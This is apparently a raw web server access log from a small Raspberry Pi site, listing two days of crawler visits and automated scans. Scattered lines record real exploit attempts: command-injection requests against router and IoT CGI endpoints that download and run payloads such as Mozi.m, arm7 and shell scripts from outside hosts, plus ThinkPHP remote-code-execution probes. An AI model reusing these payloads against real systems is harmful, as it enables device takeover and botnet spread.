Wed Sep 23 06:25:45 MDT 2020
 06:25:45 up 34 days, 17:44,  1 user,  load average: 3.97, 3.35, 3.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               19Aug20 34days  2:30m  5.54s /usr/bin/lxsession -s LXDE-pi -e LXDE
193.239.147.184 - - [23/Sep/2020:12:33:52 +0000] "HEAD / HTTP/1.0" 200 0 "" ""
66.249.70.127 - - [23/Sep/2020:13:22:40 +0000] "GET /ac0xl/logs/2020.06.19 HTTP/1.1" 200 446935 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.133.100.206 - - [23/Sep/2020:14:48:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
104.175.216.44 - - [23/Sep/2020:15:52:16 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/ac0xl/Dont-Be-Evil/Hiring%20Practices/Offer%20Review%20-%20Ann%20Arbor%20Preso.pdf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
104.175.216.44 - - [23/Sep/2020:15:52:17 +0000] "GET /ac0xl/Dont-Be-Evil/Hiring%20Practices/Offer%20Review%20-%20Ann%20Arbor%20Preso.pdf HTTP/1.1" 200 395917 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
111.225.148.74 - - [23/Sep/2020:16:44:38 +0000] "GET /ac0xl/www/slackbook/security-depth:6 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
111.225.149.75 - - [23/Sep/2020:16:45:05 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
81.41.135.82 - - [23/Sep/2020:16:47:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
186.29.180.79 - - [23/Sep/2020:16:52:16 +0000] "GET / HTTP/1.1" 400 0 "" ""
156.96.112.211 - - [23/Sep/2020:17:04:03 +0000] "GET / HTTP/1.1" 200 25000 "" ""
45.148.10.28 - - [23/Sep/2020:17:56:26 +0000] "GET /config/getuser?index=0 HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
134.19.215.196 - - [23/Sep/2020:17:58:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
134.19.215.196 - - [23/Sep/2020:17:58:51 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
173.252.107.7 - - [23/Sep/2020:18:14:46 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 266240 "" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.249.70.125 - - [23/Sep/2020:19:03:39 +0000] "GET /downloads/g2churchbooks.org/IMAGINA%20UN%20MUNDO%20SIN%20MAL-ESTAR%20%28ESPAN%CC%83OL%29%20%2810%20-%2010%20-18%29.pdf HTTP/1.1" 200 4750121 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.125 - - [23/Sep/2020:19:03:59 +0000] "GET /downloads/g2churchbooks.org/IMAGINA%20UN%20MUNDO%20SIN%20MAL-ESTAR%20%28ESPAN%CC%83OL%29%20%2810%20-%2010%20-18%29.pdf HTTP/1.1" 200 5017025 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.234.62.17 - - [23/Sep/2020:19:36:24 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" ""
183.136.225.56 - - [23/Sep/2020:19:42:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
94.102.51.119 - - [23/Sep/2020:19:59:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) "
51.195.151.247 - - [23/Sep/2020:20:43:35 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1"
66.249.70.123 - - [23/Sep/2020:21:18:16 +0000] "GET /ads.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.123 - - [23/Sep/2020:21:18:17 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.123 - - [23/Sep/2020:21:32:17 +0000] "GET /ac0xl/www/2003-ArchHunterBooks/images/6201s.jpg HTTP/1.1" 404 0 "" "Googlebot-Image/1.0"
162.243.128.132 - - [23/Sep/2020:22:03:32 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
50.92.138.39 - - [23/Sep/2020:22:21:31 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
50.92.138.39 - - [23/Sep/2020:22:22:06 +0000] "GET /downloads/g2churchbooks.org/Vol.%20III%20Imagine%2C%20A%20World%20Without%20DIS-EASE%205-29-20%20-FINAL%20EDIT.pdf HTTP/1.1" 200 14935627 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.172.111.202 - - [23/Sep/2020:22:28:04 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/zoooteedd.sh%20-O HTTP/1.0" 404 0 "" ""
50.92.138.39 - - [23/Sep/2020:22:34:30 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
50.92.138.39 - - [23/Sep/2020:22:34:48 +0000] "GET /downloads/g2churchbooks.org/eBook%20-%20Imagine%20-%20Vol.%20II%201-23-20%20-%20Final%21%20-%20.pdf HTTP/1.1" 200 11081049 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.241.234.251 - - [24/Sep/2020:00:30:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
185.172.111.202 - - [24/Sep/2020:00:35:22 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/awGawgf.sh%20-O%2 HTTP/1.0" 404 0 "" ""
199.195.254.38 - - [24/Sep/2020:02:31:02 +0000] "UNKNOWN  HTTP" 400 0 "" ""
45.148.10.28 - - [24/Sep/2020:02:34:22 +0000] "GET /config/getuser?index=0 HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
192.241.234.58 - - [24/Sep/2020:02:34:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
94.102.51.119 - - [24/Sep/2020:02:40:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) "
66.249.70.127 - - [24/Sep/2020:02:51:18 +0000] "GET /ac0xl/www/2005-museumarchives/Green-River-History/Green_River_History_Book/grhb1901.gif HTTP/1.1" 304 0 "" "Googlebot-Image/1.0"
202.83.44.114 - - [24/Sep/2020:02:52:58 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" ""
123.4.89.99 - - [24/Sep/2020:03:57:15 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.4.89.99:45804/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" ""
218.32.211.117 - - [24/Sep/2020:04:02:59 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" ""
218.32.211.117 - - [24/Sep/2020:04:03:03 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" ""
218.32.211.113 - - [24/Sep/2020:04:09:27 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" ""
66.249.70.125 - - [24/Sep/2020:04:54:33 +0000] "GET /ac0xl/www/2005-museumarchives/Raw-Data/1946.Green.River.Yearbook/Activities%207.tif HTTP/1.1" 200 16348318 "" "Googlebot-Image/1.0"
66.240.205.34 - - [24/Sep/2020:05:44:09 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.227 - - [24/Sep/2020:05:56:20 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.227 - - [24/Sep/2020:05:56:26 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.227 - - [24/Sep/2020:05:56:32 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.227 - - [24/Sep/2020:05:57:46 +0000] "GET /echo.php HTTP/1.1" 404 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
49.68.192.201 - - [24/Sep/2020:05:58:28 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" ""
176.113.115.214 - - [24/Sep/2020:06:07:26 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
176.113.115.214 - - [24/Sep/2020:06:16:03 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
176.113.115.214 - - [24/Sep/2020:06:26:36 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
176.113.115.214 - - [24/Sep/2020:06:33:49 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
66.249.70.125 - - [24/Sep/2020:07:44:10 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Paul%20Haahr_%20Google%20Resume.pdf HTTP/1.1" 200 194891 "" "Googlebot/2.1 (+http://www.google.com/bot.html)"
60.191.125.35 - - [24/Sep/2020:07:48:16 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
60.191.125.35 - - [24/Sep/2020:07:48:18 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
176.113.115.214 - - [24/Sep/2020:08:35:03 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.235.126 - - [24/Sep/2020:09:38:57 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
45.148.10.28 - - [24/Sep/2020:10:06:02 +0000] "GET /config/getuser?index=0 HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
185.172.111.202 - - [24/Sep/2020:10:37:38 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/awGawgf.sh%20-O%2 HTTP/1.0" 404 0 "" ""
37.233.77.228 - - [24/Sep/2020:10:39:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0"
176.10.99.200 - - [24/Sep/2020:11:46:07 +0000] "HEAD /MjZL HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
23.129.64.100 - - [24/Sep/2020:11:47:29 +0000] "UNKNOWN  UNKNOWN" 408 0 "" ""
27.5.46.215 - - [24/Sep/2020:11:49:52 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World"
Thu Sep 24 06:25:19 MDT 2020
 06:25:19 up 21:30,  1 user,  load average: 0.98, 1.41, 1.76
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               Wed08   22:08m  2:53   0.47s /usr/bin/lxsession -s LXDE-pi -e LXDE